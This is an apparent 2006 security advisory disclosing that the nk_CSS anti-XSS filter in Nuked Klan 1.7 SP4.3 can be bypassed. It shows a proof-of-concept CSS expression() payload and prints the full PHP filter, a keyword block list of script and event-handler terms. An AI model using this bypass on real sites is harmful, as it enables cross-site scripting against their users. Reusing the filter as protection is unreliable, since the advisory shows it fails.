Computer Security

Security Advisory: Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed
back  news / advisories / forum / software / advertising / search / exploits  forward
[EN] securityvulns.ru
no-pyccku



Related information

  Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

  [ECHO_ADV_46$2006] ExBB v1.9.1 (exbb[home_path])
Multiple Remote File Inclusion

  [SA21659] CubeCart Multiple Vulnerabilities

  phpAtm <= 1.21 (include_location
) Remote File Include Vulnerabilities

  YACS CMS <= 6.6.1 context[path_to_root]
Remote File Include Vuln

From:blwood_(at)_skynet.be <blwood_(at)_skynet.be>
Date:31.08.2006
Subject:Nuked Klan 1.7 SP4.3 : Function Anti-XSS Bypassed

// *- BEGIN -*

// By Blwood
// http://blwood.net <http://blwood.net/>

We can bypassed the function anti-xss called  nk_CSS ( nuked.php) using
like this :


<b id="blwood" style="width:expression(alert(' http://www.blwood.net'))
<http://www.blwood.net%27%29%29/>"></b>


Here is the function :

function nk_CSS($str)

{
   if ($str != "")
   {
       $str = eregi_replace("content-disposition:",
"&amp;#99;&amp;#111;&amp;#110;&amp;#116;&amp;#101;&a
mp;#110;&amp;#116;&amp;#45;&amp;#100;&amp;#105;&amp;#115;&
amp;#112;&amp;#111;&amp;#115;&amp;#105;&amp;#116;&amp;#105;&
amp;#111;&amp;#110;&amp;#58;",$str);


       $str = eregi_replace("content-type:",
"&amp;#99;&amp;#111;&amp;#110;&amp;#116;&amp;#101;&a
mp;#110;&amp;#116;&amp;#45;&amp;#116;&amp;#121;&amp;#112;&
amp;#101;&amp;#58;",$str);
       $str = eregi_replace("content-transfer-encoding:",
"&amp;#99;&amp;#111;&amp;#110;&amp;#116;&amp;#101;&a
mp;#110;&amp;#116;&amp;#45;&amp;#116;&amp;#114;&amp;#97;&
amp;#110;&amp;#115;&amp;#102;&amp;#101;&amp;#114;&amp;#45;&
amp;#101;&amp;#110;&amp;#99;&amp;#111;&amp;#100;&amp;#105;&
amp;#110;&amp;#103;&amp;#58;",$str);


       $str = eregi_replace("include",
"&amp;#105;&amp;#110;&amp;#99;&amp;#108;&amp;#117;&a
mp;#100;&amp;#101;",$str);
       $str = eregi_replace("\<\?","&amp;lt;?",
$str);
       $str = eregi_replace("<\?php","&amp;lt;?php",
$str);


       $str = eregi_replace("\?\>","?&amp;gt;",
$str);
       $str = eregi_replace("script",
"&amp;#115;&amp;#99;&amp;#114;&amp;#105;&amp;#112;&a
mp;#116;",$str);
       $str = eregi_replace("eval",
"&amp;#101;&amp;#118;&amp;#97;&amp;#108;",$str);


       $str = eregi_replace("javascript",
"&amp;#106;&amp;#97;&amp;#118;&amp;#97;&amp;#115;&am
p;#99;&amp;#114;&amp;#105;&amp;#112;&amp;#116;",$str);
       $str = eregi_replace("embed",
"&amp;#101;&amp;#109;&amp;#98;&amp;#101;&amp;#100;"
,$str);


       $str = eregi_replace("iframe",
"&amp;#105;&amp;#102;&amp;#114;&amp;#97;&amp;#109;&a
mp;#101;",$str);
       $str = eregi_replace("refresh", "&amp;#114;&amp;#101;&amp;#102;&amp;#114;&amp;#101;&
amp;#115;&amp;#104;", $str);


       $str = eregi_replace("onload", "&amp;#111;&amp;#110;&amp;#108;&amp;#111;&amp;#97;&a
mp;#100;", $str);
       $str = eregi_replace("onstart", "&amp;#111;&amp;#110;&amp;#115;&amp;#116;&amp;#97;&a
mp;#114;&amp;#116;", $str);


       $str = eregi_replace("onerror", "&amp;#111;&amp;#110;&amp;#101;&amp;#114;&amp;#114;&
amp;#111;&amp;#114;", $str);
       $str = eregi_replace("onabort", "&amp;#111;&amp;#110;&amp;#97;&amp;#98;&amp;#111;&am
p;#114;&amp;#116;", $str);


       $str = eregi_replace("onblur", "&amp;#111;&amp;#110;&amp;#98;&amp;#108;&amp;#117;&a
mp;#114;", $str);
       $str = eregi_replace("onchange", "&amp;#111;&amp;#110;&amp;#99;&amp;#104;&amp;#97;&am
p;#110;&amp;#103;&amp;#101;", $str);


       $str = eregi_replace("onclick", "&amp;#111;&amp;#110;&amp;#99;&amp;#108;&amp;#105;&a
mp;#99;&amp;#107;", $str);
       $str = eregi_replace("ondblclick", "&amp;#111;&amp;#110;&amp;#100;&amp;#98;&amp;#108;&a
mp;#99;&amp;#108;&amp;#105;&amp;#99;&amp;#107;", $str);


       $str = eregi_replace("onfocus", "&amp;#111;&amp;#110;&amp;#102;&amp;#111;&amp;#99;&a
mp;#117;&amp;#115;", $str);
       $str = eregi_replace("onkeydown", "&amp;#111;&amp;#110;&amp;#107;&amp;#101;&amp;#121;&
amp;#100;&amp;#111;&amp;#119;&amp;#110;", $str);


       $str = eregi_replace("onkeypress", "&amp;#111;&amp;#110;&amp;#107;&amp;#101;&amp;#121;&
amp;#112;&amp;#114;&amp;#101;&amp;#115;&amp;#115;", $str);
       $str = eregi_replace("onkeyup", "&amp;#111;&amp;#110;&amp;#107;&amp;#101;&amp;#121;&
amp;#117;&amp;#112;", $str);


       $str = eregi_replace("onmousedown", "&amp;#111;&amp;#110;&amp;#109;&amp;#111;&amp;#117;&
amp;#115;&amp;#101;&amp;#100;&amp;#111;&amp;#119;&amp;#110;"
, $str);
       $str = eregi_replace("onmousemove", "&amp;#111;&amp;#110;&amp;#109;&amp;#111;&amp;#117;&
amp;#115;&amp;#101;&amp;#109;&amp;#111;&amp;#118;&amp;#101;"
, $str);


       $str = eregi_replace("onmouseover", "&amp;#111;&amp;#110;&amp;#109;&amp;#111;&amp;#117;&
amp;#115;&amp;#101;&amp;#111;&amp;#118;&amp;#101;&amp;#114;"
, $str);
       $str = eregi_replace("onmouseout", "&amp;#111;&amp;#110;&amp;#109;&amp;#111;&amp;#117;&
amp;#115;&amp;#101;&amp;#111;&amp;#117;&amp;#116;", $str);


       $str = eregi_replace("onmouseup", "&amp;#111;&amp;#110;&amp;#109;&amp;#111;&amp;#117;&
amp;#115;&amp;#101;&amp;#117;&amp;#112;", $str);
       $str = eregi_replace("onreset", "&amp;#111;&amp;#110;&amp;#114;&amp;#101;&amp;#115;&
amp;#101;&amp;#116;", $str);


       $str = eregi_replace("onselect", "&amp;#111;&amp;#110;&amp;#115;&amp;#101;&amp;#108;&
amp;#101;&amp;#99;&amp;#116;", $str);
       $str = eregi_replace("onsubmit", "&amp;#111;&amp;#110;&amp;#115;&amp;#117;&amp;#98;&a
mp;#109;&amp;#105;&amp;#116;", $str);


       $str = eregi_replace("onunload", "&amp;#111;&amp;#110;&amp;#117;&amp;#110;&amp;#108;&
amp;#111;&amp;#97;&amp;#100;", $str);
       $str = eregi_replace("document", "&amp;#100;&amp;#111;&amp;#99;&amp;#117;&amp;#109;&a
mp;#101;&amp;#110;&amp;#116;", $str);


       $str = eregi_replace("cookie", "&amp;#99;&amp;#111;&amp;#111;&amp;#107;&amp;#105;&a
mp;#101;", $str);
       $str = eregi_replace("vbscript", "&amp;#118;&amp;#98;&amp;#115;&amp;#99;&amp;#114;&am
p;#105;&amp;#112;&amp;#116;", $str);


       $str = eregi_replace("location", "&amp;#108;&amp;#111;&amp;#99;&amp;#97;&amp;#116;&am
p;#105;&amp;#111;&amp;#110;", $str);
       $str = eregi_replace("object", "&amp;#111;&amp;#98;&amp;#106;&amp;#101;&amp;#99;&am
p;#116;", $str);


       $str = eregi_replace("vbs", "&amp;#118;&amp;#98;&amp;#115;", $str);
       $str = eregi_replace("href", "&amp;#104;&amp;#114;&amp;#101;&amp;#102;", $str);
       $str = eregi_replace("src", "&amp;#115;&amp;#114;&amp;#99;", $str);


   }
   return($str);
}


// *- END -*
About | Terms of use | Privacy Policy
© SecurityVulns, 3APA3A, Vladimir Dubrovin
Nizhny Novgorod

 
 


Rating@Mail.ru
test server